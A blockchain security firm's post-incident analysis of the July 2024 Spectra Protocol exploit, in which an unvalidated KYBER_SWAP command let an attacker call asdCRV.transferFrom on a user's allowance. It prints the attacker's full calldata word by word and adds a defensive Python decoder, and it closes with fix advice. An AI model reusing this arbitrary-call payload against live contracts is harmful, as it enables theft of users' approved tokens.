Spectra Protocol Hack Analysis

lunaray
3 min read · Jul 25, 2024


On July 23, 2024, we observed an attack transaction on the Ethereum blockchain: https://etherscan.io/tx/0x491cf8b2a5753fdbf3096b42e0a16bc109b957dc112d6537b1ed306e483d0744.

The targeted project was Spectra Protocol. The Spectra protocol is permissionless, meaning its services are entirely open for public use. Anyone can create new markets at will, swap yield derivatives, or become a liquidity provider.

In this attack, the attacker's profit was 188,013 asdCRV, worth about 73,325 USD at the time.

Detailed Analysis of the Attack

First, the attacker checked the asdCRV allowance that the address 0x279a7dbfae376427ffac52fcb0883147d42165ff had granted to the Spectra Protocol contract, and the asdCRV balance of that address.

Next, the attacker called the execute function of the Spectra Protocol contract to launch the attack. The execute function's code is as follows:

execute passes the input data on to _dispatch, whose code is shown below:

As the code shows, _dispatch selects the action from _commandType after masking off the flag bits with 0x3f. In this attack, _commandType was 0x12, so command = 0x12 & 0x3f = 0x12, which is KYBER_SWAP.

The KYBER_SWAP branch is shown below. Both kyberRouter and targetData are taken directly from the caller's inputs, so the Spectra Protocol contract can be made to call any address with arbitrary calldata.

The attacker's inputs decode as follows (one 32-byte word per line):

00000000000000000000000043e54c2e7b3e294de3a155785f52ab49d87b9922: address(kyberRouter)
000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee: address(tokenIn)
0000000000000000000000000000000000000000000000000000000000000000: uint256(amountIn)
000000000000000000000000ba8ce86147ded54c0879c9a954f9754a472704aa: address(tokenOut)
0000000000000000000000000000000000000000000000000000000000000001: uint256
00000000000000000000000000000000000000000000000000000000000000c0: offset of the bytes argument = 0xc0 = 32 * 6
0000000000000000000000000000000000000000000000000000000000000064: length of the bytes argument = 0x64 = 100 (a 4-byte selector plus three 32-byte words)
23b872dd000000000000000000000000279a7dbfae376427ffac52fcb0883147d42165ff000000000000000000000000ba8ce86147ded54c0879c9a954f9754a472704aa0000000000000000000000000000000000000000000027d03995eb8cff1bfcc300000000000000000000000000000000000000000000000000000000: the 100 bytes of targetData, zero-padded to a 32-byte boundary

So the attacker set kyberRouter to the address 0x43e54c2e7b3e294de3a155785f52ab49d87b9922, tokenIn to the address 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, and tokenOut to the address 0xba8ce86147ded54c0879c9a954f9754a472704aa.

Constants.ETH is defined as 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE, so the attacker's tokenIn is equal to Constants.ETH.

With tokenIn equal to Constants.ETH, the code takes the following path:

targetData decodes as follows:

23b872dd: function selector
000000000000000000000000279a7dbfae376427ffac52fcb0883147d42165ff: address(from)
000000000000000000000000ba8ce86147ded54c0879c9a954f9754a472704aa: address(to)
0000000000000000000000000000000000000000000027d03995eb8cff1bfcc3: uint256(value)

0x23b872dd is the selector of transferFrom(address,address,uint256), so the parameters are from = 0x279a7dbfae376427ffac52fcb0883147d42165ff, to = 0xba8ce86147ded54c0879c9a954f9754a472704aa, and value = 188,013,365,080,870,249,823,427 (188,013 asdCRV at 18 decimals).
Because kyberRouter was set to 0x43e54c2e7b3e294de3a155785f52ab49d87b9922, the asdCRV token contract, the call the Spectra Protocol contract actually made was asdCRV.transferFrom(0x279a7dbfae376427ffac52fcb0883147d42165ff, 0xba8ce86147ded54c0879c9a954f9754a472704aa, 188,013,365,080,870,249,823,427). That call spent the allowance which 0x279a7dbfae376427ffac52fcb0883147d42165ff had granted to the Spectra Protocol contract (the allowance the attacker checked in the first step) and sent the tokens to 0xba8ce86147ded54c0879c9a954f9754a472704aa, an address controlled by the attacker. The attack was thus complete in a single command.
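The script below is an added example, not code from Lunaray or from the Spectra Protocol: it decodes the KYBER_SWAP inputs and the nested targetData quoted above exactly as a responder would when replaying the transaction, then lists the findings that make this command suspicious. The calldata is constructed from the words shown on this page; the ABI layout (address, address, uint256, address, uint256, bytes) follows the labels in the post, the fifth word is left unnamed because the post does not name it, and the ERC-20 selectors are hard-coded constants so that no keccak library is needed.

```python
"""Decode the attacker's KYBER_SWAP inputs and the transferFrom call inside targetData."""
from typing import NamedTuple, Optional

# Constants taken from the write-up: command = _commandType & 0x3f, and 0x12 is
# KYBER_SWAP. Constants.ETH is the 0xEeee...EEeE sentinel, lowercased here.
COMMAND_MASK = 0x3F
KYBER_SWAP = 0x12
ETH_SENTINEL = "0x" + "e" * 40

# First four bytes of keccak256 of the ERC-20 signatures, kept as constants so
# the script needs no keccak library.
ERC20_SELECTORS = {
    bytes.fromhex("23b872dd"): "transferFrom(address,address,uint256)",
    bytes.fromhex("a9059cbb"): "transfer(address,uint256)",
    bytes.fromhex("095ea7b3"): "approve(address,uint256)",
}

# The attacker's inputs, constructed from the calldata words quoted in the
# write-up. Static words are left-padded with zeros to 32 bytes.
ATTACK_INPUTS = bytes.fromhex(
    "0" * 24 + "43e54c2e7b3e294de3a155785f52ab49d87b9922"    # kyberRouter
    + "0" * 24 + "e" * 40                                    # tokenIn = Constants.ETH
    + "0" * 64                                               # amountIn = 0
    + "0" * 24 + "ba8ce86147ded54c0879c9a954f9754a472704aa"  # tokenOut
    + "0" * 63 + "1"                                         # uint256 (unnamed in the write-up)
    + "0" * 62 + "c0"                                        # offset of targetData = 32 * 6
    + "0" * 62 + "64"                                        # length of targetData = 100
    + "23b872dd"                                             # transferFrom selector
    + "0" * 24 + "279a7dbfae376427ffac52fcb0883147d42165ff"  # from
    + "0" * 24 + "ba8ce86147ded54c0879c9a954f9754a472704aa"  # to
    + "0" * 44 + "27d03995eb8cff1bfcc3"                      # value
    + "0" * 56                                               # padding to a 32-byte boundary
)


def word(data: bytes, i: int) -> bytes:
    """Return the i-th 32-byte word of an ABI-encoded blob."""
    w = data[32 * i:32 * (i + 1)]
    if len(w) != 32:
        raise ValueError(f"word {i} is out of range")
    return w


def as_uint(w: bytes) -> int:
    return int.from_bytes(w, "big")


def as_address(w: bytes) -> str:
    # In canonical ABI encoding the 12 high bytes of an address word are zero.
    if any(w[:12]):
        raise ValueError("non-zero padding in address word")
    return "0x" + w[12:].hex()


def command_of(command_type: int) -> int:
    """Strip the flag bits, as the post states: command = _commandType & 0x3f."""
    return command_type & COMMAND_MASK


class KyberSwapInputs(NamedTuple):
    kyber_router: str
    token_in: str
    amount_in: int
    token_out: str
    fifth_word: int
    target_data: bytes


def decode_kyber_swap_inputs(data: bytes) -> KyberSwapInputs:
    """ABI-decode (address, address, uint256, address, uint256, bytes)."""
    offset = as_uint(word(data, 5))            # head slot of the dynamic bytes argument
    if offset % 32 or offset + 32 > len(data):
        raise ValueError("bad offset for bytes argument")
    length = as_uint(data[offset:offset + 32])
    body = data[offset + 32:offset + 32 + length]
    if len(body) != length:
        raise ValueError("truncated bytes argument")
    return KyberSwapInputs(as_address(word(data, 0)), as_address(word(data, 1)),
                           as_uint(word(data, 2)), as_address(word(data, 3)),
                           as_uint(word(data, 4)), body)


class Erc20Call(NamedTuple):
    signature: str
    args: tuple


def decode_erc20_call(target_data: bytes) -> Optional[Erc20Call]:
    """Recognise a transferFrom/transfer/approve call hidden in targetData, else None."""
    sig = ERC20_SELECTORS.get(target_data[:4])
    if sig is None:
        return None
    args = target_data[4:]
    if sig.startswith("transferFrom"):
        decoded = (as_address(word(args, 0)), as_address(word(args, 1)), as_uint(word(args, 2)))
    else:
        decoded = (as_address(word(args, 0)), as_uint(word(args, 1)))
    return Erc20Call(sig, decoded)


def audit_kyber_swap(data: bytes) -> list:
    """Findings a responder would raise when replaying a KYBER_SWAP command."""
    inp = decode_kyber_swap_inputs(data)
    call = decode_erc20_call(inp.target_data)
    findings = []
    if inp.token_in == ETH_SENTINEL and inp.amount_in == 0:
        findings.append("tokenIn is Constants.ETH with amountIn 0: nothing is actually swapped")
    if call is not None:
        findings.append(f"targetData is an ERC-20 {call.signature} call, not a Kyber swap")
        if call.signature.startswith("transferFrom"):
            findings.append(f"transferFrom spends the allowance that {call.args[0]} "
                            "granted to the calling contract")
    return findings


if __name__ == "__main__":
    assert command_of(0x12) == KYBER_SWAP
    for finding in audit_kyber_swap(ATTACK_INPUTS):
        print("-", finding)
    call = decode_erc20_call(decode_kyber_swap_inputs(ATTACK_INPUTS).target_data)
    print(call.signature, call.args, f"= {call.args[2] / 10**18:,.2f} asdCRV")
```

The dynamic `bytes` argument is decoded through its head offset (0xc0) and length word (0x64) rather than by assuming a fixed position, which is how a real decoder must treat it; the selector lookup is the check a monitoring rule would apply to any user-supplied `targetData` that a protocol contract is about to forward with its own allowances behind it.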

Summary

The root cause is that the targeted contract did not validate the parameters of the KYBER_SWAP command: kyberRouter and targetData were taken directly from user input, so a crafted inputData made the contract call any address with arbitrary calldata. The attacker used this to have the contract call transferFrom on the asdCRV token, moving tokens that users had approved to the contract into an address under the attacker's control. Project teams should validate such parameters strictly, for example by restricting external calls to a fixed, known router address rather than a caller-supplied one, and, during pre-launch audits, engage multiple auditing firms for cross-verification.

Lunaray takes a leading position in smart contract auditing and consulting service for blockchain security.